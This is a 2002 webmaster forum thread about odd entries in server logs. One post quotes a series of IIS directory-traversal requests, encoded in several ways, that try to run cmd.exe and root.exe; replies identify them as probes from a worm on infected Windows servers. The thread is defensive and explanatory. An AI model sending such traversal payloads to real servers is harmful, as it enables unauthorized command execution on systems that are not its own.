Forum Moderators: DixonJones

Message Too Old, No Replies

Weird stuff in logs

         

RussellC

2:05 pm on May 17, 2002 (gmt 0)

10+ Year Member



About the 15th or the 16th of every month my Unique visitors double on that one day with tons of unique requests from:

cache-dl01.proxy.aol.com
cache-dl10.proxy.aol.com

What is this? Is it a spider or what? It's like clockwork. Something like this happens each month. Any ideas?

PsychoTekk

2:54 pm on May 17, 2002 (gmt 0)

10+ Year Member



it first came to my mind that it could be preloading cacheservers
but that would actually require that you had set some metatag for
the servers to do so, but i suppose you have not done this?

there was a similar thread lately but i can't find it now, however,
i don't think it's a spider.

maybe the cache-backbone of aol for some part of the net has a malconfigured
timeswitch

phiznlil

9:19 pm on May 22, 2002 (gmt 0)



I have seen the following a few times:

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 151
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 151
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151

Hmm... I am not on a Windows server, what if I was?

brotherhood of LAN

9:31 pm on May 22, 2002 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I recognise that from an old thread, im not aware of what it is though. I don't think its desired either way...hopefully someone will chip in...

Macguru

9:31 pm on May 22, 2002 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Hi phiznlil,

Those requests come from windows servers infected with a worm trying to spread. If you want to get rid of them I suggest you this thread.

[webmasterworld.com...]

phiznlil

9:48 pm on May 22, 2002 (gmt 0)



Thanks for that Macguru

--
Phil

Macguru

9:53 pm on May 22, 2002 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



OOps Phil,

I forgot to mention that since your not hosted on a windows server, you wont get affected otherwise than having your logs cluttered with this junk.

WindSun

10:54 pm on May 22, 2002 (gmt 0)

10+ Year Member



Those requests are from a virus trying to get in, it does not mean you or your server has the virus.
You only need to worry if it does NOT say file not found or something like that.